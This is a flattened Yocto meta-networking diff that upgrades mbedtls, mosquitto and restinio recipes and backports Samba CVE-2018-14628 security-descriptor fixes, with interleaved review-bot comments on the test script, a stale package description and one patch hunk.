-50,6 +50,10 @@ + #if defined(__GNUC__) && defined(__AES__) && defined(__PCLMUL__) + 
#define MBEDTLS_AESNI_HAVE_INTRINSICS + #endif ++/* For 32-bit, we only support intrinsics */ ++#if defined(MBEDTLS_ARCH_IS_X86) && (defined(__GNUC__) || defined(__clang__)) ++#define MBEDTLS_AESNI_HAVE_INTRINSICS ++#endif + + /* Choose the implementation of AESNI, if one is available. + * +@@ -60,13 +64,11 @@ + #if defined(MBEDTLS_AESNI_HAVE_INTRINSICS) + #define MBEDTLS_AESNI_HAVE_CODE 2 // via intrinsics + #elif defined(MBEDTLS_HAVE_ASM) && \ +- defined(__GNUC__) && defined(MBEDTLS_ARCH_IS_X64) ++ (defined(__GNUC__) || defined(__clang__)) && defined(MBEDTLS_ARCH_IS_X64) + /* Can we do AESNI with inline assembly? + * (Only implemented with gas syntax, only for 64-bit.) + */ + #define MBEDTLS_AESNI_HAVE_CODE 1 // via assembly +-#elif defined(__GNUC__) +-# error "Must use `-mpclmul -msse2 -maes` for MBEDTLS_AESNI_C" + #else + #error "MBEDTLS_AESNI_C defined, but neither intrinsics nor assembly available" + #endif +-- +2.34.1 diff --git a/meta-networking/recipes-connectivity/mbedtls/mbedtls/run-ptest b/meta-networking/recipes-connectivity/mbedtls/mbedtls/run-ptest new file mode 100644 index 0000000000..059ab4ecbb --- /dev/null +++ b/meta-networking/recipes-connectivity/mbedtls/mbedtls/run-ptest @@ -0,0 +1,17 @@ +#!/bin/sh + +ptestdir=$(dirname "$(readlink -f "$0")") +cd "$ptestdir"/tests || exit + +tests=$(find * -type f -name 'test_suite_*') + +for f in $tests +do + if test -x ./"$f"; then + if ./"$f" > ./"$f".out 2> ./"$f".err; then + echo "PASS: $f" + else + echo "FAIL: $f" + fi + fi +done diff --git a/meta-networking/recipes-connectivity/mbedtls/mbedtls_2.28.0.bb b/meta-networking/recipes-connectivity/mbedtls/mbedtls_2.28.7.bb index d4a9c7bf8d..793cdcaff7 100644 --- a/meta-networking/recipes-connectivity/mbedtls/mbedtls_2.28.0.bb +++ b/meta-networking/recipes-connectivity/mbedtls/mbedtls_2.28.7.bb 
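Review bot: run-ptest redirects each suite's stdout and stderr to `$f.out` and `$f.err` and never prints them, so a `FAIL:` line in the ptest log arrives with no diagnostics. Printing the captured files on failure keeps the log self-contained, for example `echo "FAIL: $f"; cat ./"$f".out ./"$f".err`. The `for f in $tests` loop also relies on word splitting of the `find` output, which holds only while no test path contains whitespace. A short comment at the top of the script saying where the per-suite output is kept would help whoever debugs a failing image.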
@@ -17,16 +17,16 @@ understand what the code does. It features: \ HOMEPAGE = "https://tls.mbed.org/" -LICENSE = "Apache-2.0" -LIC_FILES_CHKSUM = "file://LICENSE;md5=3b83ef96387f14655fc854ddc3c6bd57" +LICENSE = "Apache-2.0 | GPL-2.0-or-later" +LIC_FILES_CHKSUM = "file://LICENSE;md5=379d5819937a6c2f1ef1630d341e026d" SECTION = "libs" S = "${WORKDIR}/git" -SRCREV = "8b3f26a5ac38d4fdccbc5c5366229f3e01dafcc0" +SRCREV = "555f84735aecdbd76a566cf087ec8425dfb0c8ab" SRC_URI = "git://github.com/ARMmbed/mbedtls.git;protocol=https;branch=mbedtls-2.28" -inherit cmake +inherit cmake update-alternatives PACKAGECONFIG ??= "shared-libs programs" PACKAGECONFIG[shared-libs] = "-DUSE_SHARED_MBEDTLS_LIBRARY=ON,-DUSE_SHARED_MBEDTLS_LIBRARY=OFF" @@ -41,4 +41,7 @@ RPROVIDES:${PN} = "polarssl" PACKAGES =+ "${PN}-programs" FILES:${PN}-programs = "${bindir}/" +ALTERNATIVE:${PN}-programs = "hello" +ALTERNATIVE_LINK_NAME[hello] = "${bindir}/hello" + BBCLASSEXTEND = "native nativesdk" diff --git a/meta-networking/recipes-connectivity/mbedtls/mbedtls_3.5.2.bb b/meta-networking/recipes-connectivity/mbedtls/mbedtls_3.5.2.bb new file mode 100644 index 0000000000..2fedac48cf --- /dev/null +++ b/meta-networking/recipes-connectivity/mbedtls/mbedtls_3.5.2.bb 
@@ -0,0 +1,81 @@ +SUMMARY = "Lightweight crypto and SSL/TLS library" +DESCRIPTION = "mbedtls is a lean open source crypto library \ +for providing SSL and TLS support in your programs. It offers \ +an intuitive API and documented header files, so you can actually \ +understand what the code does. It features: \ + \ + - Symmetric algorithms, like AES, Blowfish, Triple-DES, DES, ARC4, \ + Camellia and XTEA \ + - Hash algorithms, like SHA-1, SHA-2, RIPEMD-160 and MD5 \ + - Entropy pool and random generators, like CTR-DRBG and HMAC-DRBG \ + - Public key algorithms, like RSA, Elliptic Curves, Diffie-Hellman, \ + ECDSA and ECDH \ + - SSL v3 and TLS 1.0, 1.1 and 1.2 \ + - Abstraction layers for ciphers, hashes, public key operations, \ + platform abstraction and threading \ +" + +HOMEPAGE = "https://tls.mbed.org/" + +LICENSE = "Apache-2.0 | GPL-2.0-or-later" +LIC_FILES_CHKSUM = "file://LICENSE;md5=379d5819937a6c2f1ef1630d341e026d" + +SECTION = "libs" + +S = "${WORKDIR}/git" +SRCREV = "daca7a3979c22da155ec9dce49ab1abf3b65d3a9" +SRC_URI = "git://github.com/ARMmbed/mbedtls.git;protocol=https;branch=master \ + file://0001-AES-NI-use-target-attributes-for-x86-32-bit-intrinsi.patch \ + file://run-ptest" +UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>\d+(\.\d+)+)" + +inherit cmake update-alternatives ptest + +# Build with the v2 LTS version by default +DEFAULT_PREFERENCE = "-1" + +PACKAGECONFIG ??= "shared-libs programs ${@bb.utils.contains('PTEST_ENABLED', '1', 'tests', '', d)}" +PACKAGECONFIG[shared-libs] = "-DUSE_SHARED_MBEDTLS_LIBRARY=ON,-DUSE_SHARED_MBEDTLS_LIBRARY=OFF" +PACKAGECONFIG[programs] = "-DENABLE_PROGRAMS=ON,-DENABLE_PROGRAMS=OFF" +PACKAGECONFIG[werror] = "-DMBEDTLS_FATAL_WARNINGS=ON,-DMBEDTLS_FATAL_WARNINGS=OFF" +# Make X.509 and TLS calls use PSA +# https://github.com/Mbed-TLS/mbedtls/blob/development/docs/use-psa-crypto.md +PACKAGECONFIG[psa] = "" +PACKAGECONFIG[tests] = "-DENABLE_TESTING=ON,-DENABLE_TESTING=OFF" + +EXTRA_OECMAKE = 
"-DLIB_INSTALL_DIR:STRING=${libdir}" + +# For now the only way to enable PSA is to explicitly pass a -D via CFLAGS +CFLAGS:append = "${@bb.utils.contains('PACKAGECONFIG', 'psa', ' -DMBEDTLS_USE_PSA_CRYPTO', '', d)}" + +PROVIDES += "polarssl" +RPROVIDES:${PN} = "polarssl" + +PACKAGES =+ "${PN}-programs" +FILES:${PN}-programs = "${bindir}/" + +ALTERNATIVE:${PN}-programs = "hello" +ALTERNATIVE_LINK_NAME[hello] = "${bindir}/hello" + +BBCLASSEXTEND = "native nativesdk" + +CVE_PRODUCT = "mbed_tls" + +# Strip host paths from autogenerated test files +do_compile:append() { + sed -i 's+${S}/++g' ${B}/tests/*.c 2>/dev/null || : + sed -i 's+${B}/++g' ${B}/tests/*.c 2>/dev/null || : +} + +# Export source files/headers needed by Arm Trusted Firmware +sysroot_stage_all:append() { + sysroot_stage_dir "${S}/library" "${SYSROOT_DESTDIR}/usr/share/mbedtls-source/library" + sysroot_stage_dir "${S}/include" "${SYSROOT_DESTDIR}/usr/share/mbedtls-source/include" +} + +do_install_ptest () { + install -d ${D}${PTEST_PATH}/tests + cp -f ${B}/tests/test_suite_* ${D}${PTEST_PATH}/tests/ + find ${D}${PTEST_PATH}/tests/ -type f -name "*.c" -delete + cp -fR ${S}/tests/data_files ${D}${PTEST_PATH}/tests/ +} diff --git a/meta-networking/recipes-connectivity/mosquitto/files/2894.patch b/meta-networking/recipes-connectivity/mosquitto/files/2894.patch new file mode 100644 index 0000000000..7374cbd26f --- /dev/null +++ b/meta-networking/recipes-connectivity/mosquitto/files/2894.patch 
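Review bot: The DESCRIPTION in mbedtls_3.5.2.bb looks copied unchanged from the 2.28 recipe and still advertises Blowfish, ARC4, XTEA and "SSL v3 and TLS 1.0, 1.1 and 1.2". As far as I know the 3.x series removed those legacy ciphers and protocol versions and added TLS 1.3, so the text misstates what this package ships; please check against the upstream 3.0 migration notes. Suggested replacement for the protocol line: `- TLS 1.2 and 1.3, DTLS 1.2 \`, with Blowfish, ARC4 and XTEA dropped from the symmetric-algorithm line. Anyone auditing an image for legacy crypto from package metadata would be misled by the current wording.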
@@ -0,0 +1,25 @@ +From: Joachim Zobel <jz-2017@heute-morgen.de> +Date: Wed, 13 Sep 2023 09:55:34 +0200 +Subject: [PATCH] Link correctly with shared websockets library if needed see: + https://github.com/eclipse/mosquitto/pull/2751 + +Patch contributed by Joachim Zobel <jz-2017@heute-morgen.de> and Daniel Engberg <daniel.engberg.lists@pyret.net> +--- +Upstream-Status: Pending + + src/CMakeLists.txt | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/src/CMakeLists.txt b/src/CMakeLists.txt +index 9380a04..dce8313 100644 +--- a/src/CMakeLists.txt ++++ b/src/CMakeLists.txt +@@ -200,7 +200,7 @@ if (WITH_WEBSOCKETS) + link_directories(${mosquitto_SOURCE_DIR}) + endif (WIN32) + else (STATIC_WEBSOCKETS) +- set (MOSQ_LIBS ${MOSQ_LIBS} websockets) ++ set (MOSQ_LIBS ${MOSQ_LIBS} websockets_shared) + endif (STATIC_WEBSOCKETS) + endif (WITH_WEBSOCKETS) + diff --git a/meta-networking/recipes-connectivity/mosquitto/files/2895.patch b/meta-networking/recipes-connectivity/mosquitto/files/2895.patch new file mode 100644 index 0000000000..853f881754 --- /dev/null +++ b/meta-networking/recipes-connectivity/mosquitto/files/2895.patch 
@@ -0,0 +1,27 @@ +From: Joachim Zobel <jz-2017@heute-morgen.de> +Date: Wed, 13 Sep 2023 10:05:43 +0200 +Subject: [PATCH] Mosquitto now waits for network-online when starting + (Closes: #1036450) + +See: https://github.com/eclipse/mosquitto/issues/2878 +--- +Upstream-Status: Pending + + service/systemd/mosquitto.service.simple | 4 ++-- + 1 file changed, 2 insertions(+), 2 deletions(-) + +diff --git a/service/systemd/mosquitto.service.simple b/service/systemd/mosquitto.service.simple +index 15ee0d6..c2a330b 100644 +--- a/service/systemd/mosquitto.service.simple ++++ b/service/systemd/mosquitto.service.simple +@@ -1,8 +1,8 @@ + [Unit] + Description=Mosquitto MQTT Broker + Documentation=man:mosquitto.conf(5) man:mosquitto(8) +-After=network.target +-Wants=network.target ++After=network-online.target ++Wants=network-online.target + + [Service] + ExecStart=/usr/sbin/mosquitto -c /etc/mosquitto/mosquitto.conf diff --git a/meta-networking/recipes-connectivity/mosquitto/files/mosquitto.init b/meta-networking/recipes-connectivity/mosquitto/files/mosquitto.init index 9d5963c418..d0da219d6d 100644 --- a/meta-networking/recipes-connectivity/mosquitto/files/mosquitto.init +++ b/meta-networking/recipes-connectivity/mosquitto/files/mosquitto.init 
@@ -1,18 +1,18 @@ -#! /bin/sh +#!/bin/sh # Based on the Debian initscript for mosquitto ### BEGIN INIT INFO -# Provides: mosquitto -# Required-Start: $remote_fs $syslog -# Required-Stop: $remote_fs $syslog -# Default-Start: 2 3 4 5 -# Default-Stop: 0 1 6 -# Short-Description: mosquitto MQTT message broker -# Description: -# This is a message broker that supports version 3.1/3.1.1 of the MQ Telemetry +# Provides: mosquitto +# Required-Start: $remote_fs $syslog +# Required-Stop: $remote_fs $syslog +# Default-Start: 2 3 4 5 +# Default-Stop: 0 1 6 +# Short-Description: mosquitto MQTT 3.1/3.1.1 message broker +# Description: +# This is a message broker that supports version 3.1 of the MQ Telemetry # Transport (MQTT) protocol. -# +# # MQTT provides a method of carrying out messaging using a publish/subscribe # model. It is lightweight, both in terms of bandwidth usage and ease of # implementation. This makes it particularly useful at the edge of the network diff --git a/meta-networking/recipes-connectivity/mosquitto/mosquitto_2.0.14.bb b/meta-networking/recipes-connectivity/mosquitto/mosquitto_2.0.18.bb index 739b7de625..ea9eb4857b 100644 --- a/meta-networking/recipes-connectivity/mosquitto/mosquitto_2.0.14.bb +++ b/meta-networking/recipes-connectivity/mosquitto/mosquitto_2.0.18.bb @@ -17,13 +17,15 @@ DEPENDS = "uthash cjson" SRC_URI = "http://mosquitto.org/files/source/mosquitto-${PV}.tar.gz \ file://mosquitto.init \ file://1571.patch \ + file://2894.patch \ + file://2895.patch \ " -SRC_URI[sha256sum] = "d0dde8fdb12caf6e2426b4f28081919a2fce3448773bdb8af0d3cd5fe5776925" +SRC_URI[sha256sum] = "d665fe7d0032881b1371a47f34169ee4edab67903b2cd2b4c083822823f4448a" inherit systemd update-rc.d useradd cmake pkgconfig -PACKAGECONFIG ??= "ssl dlt websockets \ +PACKAGECONFIG ??= "ssl websockets \ ${@bb.utils.filter('DISTRO_FEATURES','systemd', d)} \ " 
@@ -87,4 +89,4 @@ USERADD_PACKAGES = "${PN}" USERADD_PARAM:${PN} = "--system --no-create-home --shell /bin/false \ --user-group mosquitto" -BBCLASSEXTEND += "native nativesdk" +BBCLASSEXTEND = "native" diff --git a/meta-networking/recipes-connectivity/restinio/restinio_0.6.13.bb b/meta-networking/recipes-connectivity/restinio/restinio_0.6.13.bb index e715135dc3..03eff43dd2 100644 --- a/meta-networking/recipes-connectivity/restinio/restinio_0.6.13.bb +++ b/meta-networking/recipes-connectivity/restinio/restinio_0.6.13.bb @@ -9,11 +9,11 @@ LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://../LICENSE;md5=f399b62ce0a152525d1589a5a40c0ff6" DEPENDS = "asio fmt http-parser" -SRC_URI = "https://github.com/Stiffstream/restinio/releases/download/v.${PV}/restinio-${PV}.tar.bz2" +SRC_URI = "https://github.com/Stiffstream/restinio/releases/download/v.${PV}/${BP}.tar.bz2" SRC_URI[md5sum] = "37a4310e98912030a74bdd4ed789f33c" SRC_URI[sha256sum] = "b35d696e6fafd4563ca708fcecf9d0cf6705c846d417b5000f5252e0188848e7" -S = "${WORKDIR}/${PN}-${PV}/dev" +S = "${WORKDIR}/${BP}/dev" inherit cmake diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0001.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0001.patch new file mode 100644 index 0000000000..d938e8cd66 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0001.patch 
@@ -0,0 +1,147 @@ +From cbbfc917b9635bc62825ea64a157028297f54fb7 Mon Sep 17 00:00:00 2001 +From: Stefan Metzmacher <metze@samba.org> +Date: Fri, 29 Jan 2016 23:35:31 +0100 +Subject: [PATCH] CVE-2018-14628: python:descriptor: let samba-tool dbcheck fix + the nTSecurityDescriptor on CN=Deleted Objects containers + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=13595 + +Signed-off-by: Stefan Metzmacher <metze@samba.org> +Reviewed-by: Andrew Bartlett <abartlet@samba.org> +(cherry picked from commit 97e4aab1a6e2feda7c6c6fdeaa7c3e1818c55566) + +Autobuild-User(v4-18-test): Jule Anger <janger@samba.org> +Autobuild-Date(v4-18-test): Mon Oct 23 09:52:22 UTC 2023 on atb-devel-224 + +CVE: CVE-2018-14628 + +Upstream-Status: Backport[https://github.com/samba-team/samba/commit/cbbfc917b9635bc62825ea64a157028297f54fb7] + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + python/samba/dbchecker.py | 10 ++++++++-- + python/samba/descriptor.py | 15 ++++++++++++++- + testprogs/blackbox/dbcheck-links.sh | 12 ++++++++++++ + 3 files changed, 34 insertions(+), 3 deletions(-) + +diff --git a/python/samba/dbchecker.py b/python/samba/dbchecker.py +index d10d765..d8c2341 100644 +--- a/python/samba/dbchecker.py ++++ b/python/samba/dbchecker.py +@@ -2433,7 +2433,7 @@ newSuperior: %s""" % (str(from_dn), str(to_rdn), str(to_base))) + error_count += 1 + continue + +- if self.reset_well_known_acls: ++ if dn == deleted_objects_dn or self.reset_well_known_acls: + try: + well_known_sd = self.get_wellknown_sd(dn) + except KeyError: +@@ -2442,7 +2442,13 @@ newSuperior: %s""" % (str(from_dn), str(to_rdn), str(to_base))) + current_sd = ndr_unpack(security.descriptor, + obj[attrname][0]) + +- diff = get_diff_sds(well_known_sd, current_sd, security.dom_sid(self.samdb.get_domain_sid())) ++ ignoreAdditionalACEs = False ++ if not self.reset_well_known_acls: ++ ignoreAdditionalACEs = True ++ ++ diff = get_diff_sds(well_known_sd, current_sd, ++ 
security.dom_sid(self.samdb.get_domain_sid()), ++ ignoreAdditionalACEs=ignoreAdditionalACEs) + if diff != "": + self.err_wrong_default_sd(dn, well_known_sd, diff) + error_count += 1 +diff --git a/python/samba/descriptor.py b/python/samba/descriptor.py +index 0998348..08cfab0 100644 +--- a/python/samba/descriptor.py ++++ b/python/samba/descriptor.py +@@ -407,6 +407,7 @@ def get_wellknown_sds(samdb): + # Then subcontainers + subcontainers = [ + (ldb.Dn(samdb, "%s" % str(samdb.domain_dn())), get_domain_descriptor), ++ (ldb.Dn(samdb, "CN=Deleted Objects,%s" % str(samdb.domain_dn())), get_deletedobjects_descriptor), + (ldb.Dn(samdb, "CN=LostAndFound,%s" % str(samdb.domain_dn())), get_domain_delete_protected2_descriptor), + (ldb.Dn(samdb, "CN=System,%s" % str(samdb.domain_dn())), get_domain_delete_protected1_descriptor), + (ldb.Dn(samdb, "CN=Infrastructure,%s" % str(samdb.domain_dn())), get_domain_infrastructure_descriptor), +@@ -417,6 +418,7 @@ def get_wellknown_sds(samdb): + (ldb.Dn(samdb, "CN=MicrosoftDNS,CN=System,%s" % str(samdb.domain_dn())), get_dns_domain_microsoft_dns_descriptor), + + (ldb.Dn(samdb, "%s" % str(samdb.get_config_basedn())), get_config_descriptor), ++ (ldb.Dn(samdb, "CN=Deleted Objects,%s" % str(samdb.get_config_basedn())), get_deletedobjects_descriptor), + (ldb.Dn(samdb, "CN=NTDS Quotas,%s" % str(samdb.get_config_basedn())), get_config_ntds_quotas_descriptor), + (ldb.Dn(samdb, "CN=LostAndFoundConfig,%s" % str(samdb.get_config_basedn())), get_config_delete_protected1wd_descriptor), + (ldb.Dn(samdb, "CN=Services,%s" % str(samdb.get_config_basedn())), get_config_delete_protected1_descriptor), +@@ -441,6 +443,9 @@ def get_wellknown_sds(samdb): + if ldb.Dn(samdb, nc.decode('utf8')) == dnsforestdn: + c = (ldb.Dn(samdb, "%s" % str(dnsforestdn)), get_dns_partition_descriptor) + subcontainers.append(c) ++ c = (ldb.Dn(samdb, "CN=Deleted Objects,%s" % str(dnsforestdn)), ++ get_deletedobjects_descriptor) ++ subcontainers.append(c) + c = (ldb.Dn(samdb, 
"CN=Infrastructure,%s" % str(dnsforestdn)), + get_domain_delete_protected1_descriptor) + subcontainers.append(c) +@@ -456,6 +461,9 @@ def get_wellknown_sds(samdb): + if ldb.Dn(samdb, nc.decode('utf8')) == dnsdomaindn: + c = (ldb.Dn(samdb, "%s" % str(dnsdomaindn)), get_dns_partition_descriptor) + subcontainers.append(c) ++ c = (ldb.Dn(samdb, "CN=Deleted Objects,%s" % str(dnsdomaindn)), ++ get_deletedobjects_descriptor) ++ subcontainers.append(c) + c = (ldb.Dn(samdb, "CN=Infrastructure,%s" % str(dnsdomaindn)), + get_domain_delete_protected1_descriptor) + subcontainers.append(c) +@@ -548,7 +556,8 @@ def get_clean_sd(sd): + return sd_clean + + +-def get_diff_sds(refsd, cursd, domainsid, checkSacl=True): ++def get_diff_sds(refsd, cursd, domainsid, checkSacl=True, ++ ignoreAdditionalACEs=False): + """Get the difference between 2 sd + + This function split the textual representation of ACL into smaller +@@ -603,6 +612,10 @@ def get_diff_sds(refsd, cursd, domainsid, checkSacl=True): + h_ref.remove(k) + + if len(h_cur) + len(h_ref) > 0: ++ if txt == "" and len(h_ref) == 0: ++ if ignoreAdditionalACEs: ++ return "" ++ + txt = "%s\tPart %s is different between reference" \ + " and current here is the detail:\n" % (txt, part) + +diff --git a/testprogs/blackbox/dbcheck-links.sh b/testprogs/blackbox/dbcheck-links.sh +index f00fe46..06b24fb 100755 +--- a/testprogs/blackbox/dbcheck-links.sh ++++ b/testprogs/blackbox/dbcheck-links.sh +@@ -58,6 +58,16 @@ dbcheck() { + fi + } + ++dbcheck_acl_reset() ++{ ++ $PYTHON $BINDIR/samba-tool dbcheck -H tdb://$PREFIX_ABS/${RELEASE}/private/sam.ldb --cross-ncs --fix --yes --attrs=nTSecurityDescriptor ++} ++ ++dbcheck_acl_clean() ++{ ++ $PYTHON $BINDIR/samba-tool dbcheck -H tdb://$PREFIX_ABS/${RELEASE}/private/sam.ldb --cross-ncs --attrs=nTSecurityDescriptor ++} ++ + dbcheck_dangling() { + dbcheck "" "1" "--selftest-check-expired-tombstones" + return $? 
+@@ -893,6 +903,8 @@ EOF + remove_directory $PREFIX_ABS/${RELEASE} + + testit $RELEASE undump || failed=`expr $failed + 1` ++testit_expect_failure "dbcheck_acl_reset" dbcheck_acl_reset || failed=$(expr $failed + 1) ++testit "dbcheck_acl_clean" dbcheck_acl_clean || failed=$(expr $failed + 1) + testit "add_two_more_users" add_two_more_users || failed=`expr $failed + 1` + testit "add_four_more_links" add_four_more_links || failed=`expr $failed + 1` + testit "remove_one_link" remove_one_link || failed=`expr $failed + 1` +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0002.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0002.patch new file mode 100644 index 0000000000..e3d45627a5 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0002.patch 
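Review bot: In the `get_diff_sds` hunk (`@@ -603,6 +612,10 @@`), the new `return ""` leaves the function as soon as one part has only additional ACEs, so any part compared after it is never examined when `ignoreAdditionalACEs` is set. If this code sits inside a per-part loop, as the `part` variable on the following line suggests (the loop itself is outside the hunk), a DACL with extra ACEs would hide a reference ACE missing from a later part. `if ignoreAdditionalACEs and len(h_ref) == 0: continue` would skip only the current part; since this is a backport, confirm the intended behaviour against upstream before deviating. The `Upstream-Status: Backport[...]` line also lacks the space before the bracket that the other patches in this series use.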
@@ -0,0 +1,72 @@ +From f967b91da76f86a9feb4c1469fccfce93be8bc79 Mon Sep 17 00:00:00 2001 +From: Stefan Metzmacher <metze@samba.org> +Date: Wed, 7 Jun 2023 18:18:58 +0200 +Subject: [PATCH] CVE-2018-14628: dbchecker: use get_deletedobjects_descriptor + for missing deleted objects container + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=13595 + +Signed-off-by: Stefan Metzmacher <metze@samba.org> +Reviewed-by: Andrew Bartlett <abartlet@samba.org> +(cherry picked from commit 70586061128f90afa33f25e104d4570a1cf778db) + +CVE: CVE-2018-14628 + +Upstream-Status: Backport +[https://github.com/samba-team/samba/commit/f967b91da76f86a9feb4c1469fccfce93be8bc79] + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + python/samba/dbchecker.py | 16 +++++++++++++--- + 1 file changed, 13 insertions(+), 3 deletions(-) + +diff --git a/python/samba/dbchecker.py b/python/samba/dbchecker.py +index d8c2341..35b6eeb 100644 +--- a/python/samba/dbchecker.py ++++ b/python/samba/dbchecker.py +@@ -21,7 +21,7 @@ from __future__ import print_function + import ldb + import samba + import time +-from base64 import b64decode ++from base64 import b64decode, b64encode + from samba import dsdb + from samba import common + from samba.dcerpc import misc +@@ -30,7 +30,11 @@ from samba.ndr import ndr_unpack, ndr_pack + from samba.dcerpc import drsblobs + from samba.samdb import dsdb_Dn + from samba.dcerpc import security +-from samba.descriptor import get_wellknown_sds, get_diff_sds ++from samba.descriptor import ( ++ get_wellknown_sds, ++ get_deletedobjects_descriptor, ++ get_diff_sds ++) + from samba.auth import system_session, admin_session + from samba.netcmd import CommandError + from samba.netcmd.fsmo import get_fsmo_roleowner +@@ -340,6 +344,11 @@ class dbcheck(object): + wko_prefix = "B:32:%s" % dsdb.DS_GUID_DELETED_OBJECTS_CONTAINER + listwko.append('%s:%s' % (wko_prefix, dn)) + guid_suffix = "" ++ ++ domain_sid = security.dom_sid(self.samdb.get_domain_sid()) ++ sec_desc 
= get_deletedobjects_descriptor(domain_sid, ++ name_map=self.name_map) ++ sec_desc_b64 = b64encode(sec_desc).decode('utf8') + + # Insert a brand new Deleted Objects container + self.samdb.add_ldif("""dn: %s +@@ -349,7 +358,8 @@ description: Container for deleted objects + isDeleted: TRUE + isCriticalSystemObject: TRUE + showInAdvancedViewOnly: TRUE +-systemFlags: -1946157056%s""" % (dn, guid_suffix), ++nTSecurityDescriptor:: %s ++systemFlags: -1946157056%s""" % (dn, sec_desc_b64, guid_suffix), + controls=["relax:0", "provision:0"]) + + delta = ldb.Message() +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0003.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0003.patch new file mode 100644 index 0000000000..df30e0c106 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0003.patch 
@@ -0,0 +1,106 @@ +From edac27f5408191567233983562091484ebbbad0a Mon Sep 17 00:00:00 2001 +From: Stefan Metzmacher <metze@samba.org> +Date: Mon, 26 Jun 2023 15:14:24 +0200 +Subject: [PATCH] CVE-2018-14628: s4:dsdb: remove unused code in + dirsync_filter_entry() + +This makes the next change easier to understand. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=13595 + +Signed-off-by: Stefan Metzmacher <metze@samba.org> +Reviewed-by: Andrew Bartlett <abartlet@samba.org> +(cherry picked from commit 498542be0bbf4f26558573c1f87b77b8e3509371) + +CVE: CVE-2018-14628 + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/edac27f5408191567233983562091484ebbbad0a] + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + source4/dsdb/samdb/ldb_modules/dirsync.c | 53 +++--------------------- + 1 file changed, 5 insertions(+), 48 deletions(-) + +diff --git a/source4/dsdb/samdb/ldb_modules/dirsync.c b/source4/dsdb/samdb/ldb_modules/dirsync.c +index e61ade8..e7fb27f 100644 +--- a/source4/dsdb/samdb/ldb_modules/dirsync.c ++++ b/source4/dsdb/samdb/ldb_modules/dirsync.c +@@ -152,10 +152,6 @@ static int dirsync_filter_entry(struct ldb_request *req, + * list only the attribute that have been modified since last interogation + * + */ +- newmsg = ldb_msg_new(dsc->req); +- if (newmsg == NULL) { +- return ldb_oom(ldb); +- } + for (i = msg->num_elements - 1; i >= 0; i--) { + if (ldb_attr_cmp(msg->elements[i].name, "uSNChanged") == 0) { + int error = 0; +@@ -202,11 +198,6 @@ static int dirsync_filter_entry(struct ldb_request *req, + */ + return LDB_SUCCESS; + } +- newmsg->dn = ldb_dn_new(newmsg, ldb, ""); +- if (newmsg->dn == NULL) { +- return ldb_oom(ldb); +- } +- + el = ldb_msg_find_element(msg, "objectGUID"); + if ( el != NULL) { + guidfound = true; +@@ -217,48 +208,14 @@ static int dirsync_filter_entry(struct ldb_request *req, + * well will uncomment the code bellow + */ + SMB_ASSERT(guidfound == true); +- /* +- if (guidfound == false) { +- 
struct GUID guid; +- struct ldb_val *new_val; +- DATA_BLOB guid_blob; +- +- tmp[0] = '\0'; +- txt = strrchr(txt, ':'); +- if (txt == NULL) { +- return ldb_module_done(dsc->req, NULL, NULL, LDB_ERR_OPERATIONS_ERROR); +- } +- txt++; +- +- status = GUID_from_string(txt, &guid); +- if (!NT_STATUS_IS_OK(status)) { +- return ldb_module_done(dsc->req, NULL, NULL, LDB_ERR_OPERATIONS_ERROR); +- } +- +- status = GUID_to_ndr_blob(&guid, msg, &guid_blob); +- if (!NT_STATUS_IS_OK(status)) { +- return ldb_module_done(dsc->req, NULL, NULL, LDB_ERR_OPERATIONS_ERROR); +- } +- +- new_val = talloc(msg, struct ldb_val); +- if (new_val == NULL) { +- return ldb_oom(ldb); +- } +- new_val->data = talloc_steal(new_val, guid_blob.data); +- new_val->length = guid_blob.length; +- if (ldb_msg_add_value(msg, "objectGUID", new_val, NULL) != 0) { +- return ldb_module_done(dsc->req, NULL, NULL, LDB_ERR_OPERATIONS_ERROR); +- } +- } +- */ +- ldb_msg_add(newmsg, el, LDB_FLAG_MOD_ADD); +- talloc_steal(newmsg->elements, el->name); +- talloc_steal(newmsg->elements, el->values); +- +- talloc_steal(newmsg->elements, msg); + return ldb_module_send_entry(dsc->req, msg, controls); + } + ++ newmsg = ldb_msg_new(dsc->req); ++ if (newmsg == NULL) { ++ return ldb_oom(ldb); ++ } ++ + ndr_err = ndr_pull_struct_blob(replMetaData, dsc, &rmd, + (ndr_pull_flags_fn_t)ndr_pull_replPropertyMetaDataBlob); + if (!NDR_ERR_CODE_IS_SUCCESS(ndr_err)) { +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0004.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0004.patch new file mode 100644 index 0000000000..6fa4ef10dd --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0004.patch 
